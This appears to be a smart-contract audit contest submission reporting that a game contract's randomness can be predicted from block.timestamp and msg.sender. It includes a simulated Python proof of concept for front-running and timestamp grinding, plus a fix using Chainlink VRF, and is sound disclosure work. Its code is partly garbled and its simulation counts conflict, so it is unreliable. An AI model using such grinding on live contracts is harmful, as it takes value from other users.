Company Simulator

First Flight #51

Beginner FriendlyDeFi

100 EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Predictable Randomness Allows Economic Exploitation Through Demand Manipulation

comfortnurse021

The root cause is the use of insecure and predictable sources for randomness. The contract uses block.timestamp and msg.sender to generate a seed, which is then used to calculate the number of items requested. Both block.timestamp and msg.sender are known or can be manipulated by the miner or an attacker.

impact

Economic exploitation: Attackers can consistently get more items for the same price, leading to an unfair advantage and potential drain of contract funds.

Description

Normal behavior: The Cyfrin Customer Engine contract is designed to simulate customer demand in a blockchain-based company simulation. Users can trigger a demand for items by paying ETH, and the number of items requested is determined by a pseudo-random algorithm that takes into account the company's reputation and a random seed derived from block.timestamp and msg.sender.
Unexpected behavior: The pseudo-random number generation is predictable and can be manipulated by miners and attackers. This allows them to know in advance the number of items that will be requested and to front-run transactions or manipulate block timestamps to always get the maximum number of items, leading to economic exploitation
root cause link.https://github.com/CodeHawks-Contests/2025-10-company-simulator/blob/8bfead8b8a48bf7d20f1ee78a0566ab2b0b76e2d/src/CustomerEngine.vy#L69C4-L81C30

Risk

Likelihood:

Miners consistently manipulate block timestamps within allowed ranges to optimize outcomes
Attackers monitoring mempool transactions predict demand outcomes for pending transactions
Bots systematically front-run transactions when detecting optimal demand conditions
The deterministic algorithm allows pre-computation of outcomes for future blocks

Impact:

Economic exploitation through guaranteed maximum demand outcomes (5 items vs average 2.92)
Unfair advantage for sophisticated actors over regular users in the simulation

Proof of Concept

The vulnerability allows three main attack vectors:

Prediction Attack: Attackers can compute future demand outcomes by monitoring approximate block timestamps. In testing, predictions showed clear patterns (2, 5, 5, 2, 4 items over 60 seconds).

Front-running Attack: Bots can detect when current block conditions yield maximum items (5) and replace pending transactions with higher gas prices, guaranteeing optimal outcomes.

Miner Manipulation: Miners can test multiple timestamps for the same block and choose the one yielding maximum profit, increasing earnings by 0.08 ETH per optimal transaction.

Statistical analysis of 100 simulations shows 27% chance of maximum items versus expected 20% in fair distribution, proving systematic exploitability.

Demonstrates how attackers can predict and manipulate the pseudo-random demand calculation

> """

> from web3 import Web3

> import time

> import random

> class RandomnessAttack:

> def __init__(self, rpc_url="http://localhost:8545"):

> try:

> self.w3 = Web3(Web3.HTTPProvider(rpc_url))

> # We'll run in simulation mode without actual connection

> print(" Running in simulation mode (no blockchain connection required)")

> except:

> print(" Running in simulation mode (no blockchain connection required)")

> def simulate_contract_randomness(self, timestamp, sender_address, reputation=80):

> """

> Simulates the exact same randomness calculation as the Vyper contract

> """

> # Convert to bytes32 as done in contract

> timestamp_bytes = timestamp.to_bytes(32, 'big')

> sender_bytes = Web3.to_bytes(hexstr=sender_address).rjust(32, b'\x00')

> # Concatenate and hash (same as contract)

> combined = timestamp_bytes + sender_bytes

> seed_hash = Web3.keccak(combined)

> seed_int = int.from_bytes(seed_hash, 'big')

> # Calculate demand (same logic as contract)

> base = seed_int % 5 # 0 to 4

> extra_item_chance = 0

> # Check if extra item is granted (based on reputation)

> if (seed_int % 100) < (reputation - 50):

> extra_item_chance = 1

> requested = base + 1 + extra_item_chance # 1 to 6

> requested = min(requested, 5) # cap at 5 (MAX_REQUEST)

rint("> return {

> 'seed': seed_int,

> 'base_items': base + 1,

> 'extra_item_granted': extra_item_chance == 1,

> 'final_requested': requested,

> 'total_cost_eth': requested * 0.02, # 0.02 ETH per item

> 'timestamp_used': timestamp,

> 'address_used': sender_address

> }

> def demonstrate_prediction_attack(self):

> """Show how attackers can predict outcomes"""

> print("=== RANDOMNESS PREDICTION ATTACK ===")

> print("Attackers can predict demand by monitoring block timestamps\n")

> # Simulate attacker with known address

> attacker_address = "0x70997970C51812dc3A010C7d01b50e0d17dc79C8"

> current_time = int(time.time())

> print("Predicting demands for next 60 seconds:")

> print("-" * 60)

> for seconds_ahead in range(0, 60, 5): # Check every 5 seconds

> future_timestamp = current_time + seconds_ahead

> result = self.simulate_contract_randomness(future_timestamp, attacker_address)

> print(f"Timestamp +{seconds_ahead}s: {result['final_requested']} items "

> f"(Seed: {result['seed'] % 10000:04d}...) - "

> f"Cost: {result['total_cost_eth']:.4f} ETH")

> print("Attackers wait for favorable conditions then front-run transactions\n")

> victim_address = "0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC"

> current_time = int(time.time())

> print("Monitoring for optimal conditions (5 items for max profit):")

> found_optimal = False

> for check in range(100): # Check 100 future timestamps

> test_time = current_time + check

> result = self.simulate_contract_randomness(test_time, victim_address)

> if result['final_requested'] == 5: # Max items

> print(f" OPTIMAL FOUND: Block timestamp {test_time} -> "

> f"{result['final_requested']} items "

> f"(Seed: {result['seed'] % 10000:04d})")

> found_optimal = True

> # Show attack execution

> print(" ⚡ ATTACKER ACTION: Front-run victim transaction")

> print(" PROFIT: Get 5 items instead of potentially fewer")

> break

> if not found_optimal:

> print("No optimal conditions found in sample (normal variance)")

> def demonstrate_miner_manipulation(self):

> """Show how miners can manipulate timestamps"""

> print("\n=== MINER MANIPULATION ATTACK ===")

> print("Miners can choose timestamps to maximize their profits\n")

> miner_address = "0x90F79bf6EB2c4f870365E785982E1f101E93b906"

> print("Miner testing different timestamps for same block:")

> base_time = int(time.time())

> best_result = None

> best_timestamp = None

> # Miner tests 10 different timestamps

> for offset in range(10):

> test_time = base_time + offset

> result = self.simulate_contract_randomness(test_time, miner_address)

> print(f" Timestamp {offset}: {result['final_requested']} items")

> if best_result is None or result['final_requested'] > best_result['final_requested']:

> best_result = result

> best_timestamp = test_time

> if best_result:

> print(f"\n MINER CHOOSES: Timestamp {best_timestamp} "

> f"-> {best_result['final_requested']} items")

> print(f" Increased profit by {best_result['total_cost_eth'] - 0.02:.4f} ETH "

> f"vs minimum 1 item")

> def statistical_analysis(self):

> """Show the statistical advantage attackers gain"""

> print("\n=== STATISTICAL ANALYSIS ===")

> p"Running 1000 simulations to show predictability...")

> test_address = "0x70997970C51812dc3A010C7d01b50e0d17dc79C8"

> results = {1: 0, 2: 0, 3: 0, 4: 0, 5: 0}

> try:

> self.demonstrate_prediction_attack()

> self.demonstrate_frontrunning_attack()

> self.demonstrate_miner_manipulation()

> self.statistical_analysis()

expected output

Timestamp +0s: 2 items (Seed: 5151...) - Cost: 0.0400 ETH

Timestamp +5s: 5 items (Seed: 6903...) - Cost: 0.1000 ETH

Timestamp +10s: 5 items (Seed: 8474...) - Cost: 0.1000 ETH

Timestamp +15s: 2 items (Seed: 2325...) - Cost: 0.0400 ETH

Timestamp +20s: 4 items (Seed: 5973...) - Cost: 0.0800 ETH

Timestamp +25s: 2 items (Seed: 5020...) - Cost: 0.0400 ETH

Timestamp +30s: 2 items (Seed: 1936...) - Cost: 0.0400 ETH

Timestamp +35s: 2 items (Seed: 6566...) - Cost: 0.0400 ETH

Timestamp +40s: 1 items (Seed: 9955...) - Cost: 0.0200 ETH

Timestamp +45s: 3 items (Seed: 5882...) - Cost: 0.0600 ETH

Timestamp +50s: 2 items (Seed: 5196...) - Cost: 0.0400 ETH

Timestamp +55s: 3 items (Seed: 5277...) - Cost: 0.0600 ETH

Running 1000 simulations to show predictability...

Distribution of items requested:

1 items: 163 times (16.3%)

2 items: 210 times (21.0%)

3 items: 201 times (20.1%)

4 items: 196 times (19.6%)

5 items: 230 times (23.0%)

The contract's randomness relies solely on block.timestamp and msg.sender, both publicly visible values. Since block timestamps increase predictably and sender addresses are known in advance, attackers can precompute demand outcomes for future blocks.

How it works:

Attackers monitor current block timestamp: 1761608503

Calculate future timestamps by adding increments: +5s, +10s, +15s...

For each future timestamp, compute: keccak256(timestamp + sender_address)

Derive demand size using the same formula as the contract

Results show clear, predictable patterns over time

Recommended Mitigation

Replace the vulnerable pseudo-randomness with verifiable randomness sources:

Option 1: Chainlink VRF - Provides cryptographically secure randomness that cannot be manipulated

Option 2: Commit-Reveal Pattern - Makes randomness unpredictable through two-phase commits

diff

- # Vulnerable pseudo-randomness

- seed: uint256 = convert(

- keccak256(

- concat(

- convert(block.timestamp, bytes32),

- convert(msg.sender, bytes32)

- )

- ),

- uint256,

- )

+ # Use Chainlink VRF for verifiable randomness

+ requestId: uint256 = VRFCoordinator.requestRandomWords(

+ keyHash, subId, minConfirmations, callbackGasLimit, 1

+ )

+ self.pending_requests[requestId] = msg.sender

Explanation: Chainlink VRF uses oracle networks and cryptographic proofs to generate randomness that cannot be predicted or manipulated by any party, ensuring true fairness in demand simulation. The commit-reveal alternative uses cryptographic commitments to hide inputs until revealed, preventing front-running.

Both solutions eliminate the predictability that enables economic exploitation while maintaining the game's intended mechanics.

Updates

Lead Judging Commences

0xshaedyw Lead Judge

5 days ago

0xshaedyw Lead Judge 3 days ago

Submission Judgement Published

Validated

Assigned finding tags:

Medium – Predictable Seed

Demand randomness is grindable via timestamp and sender, enabling biased outcomes and reputation manipulation.

Rewards breakdown

nSLOC

265

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.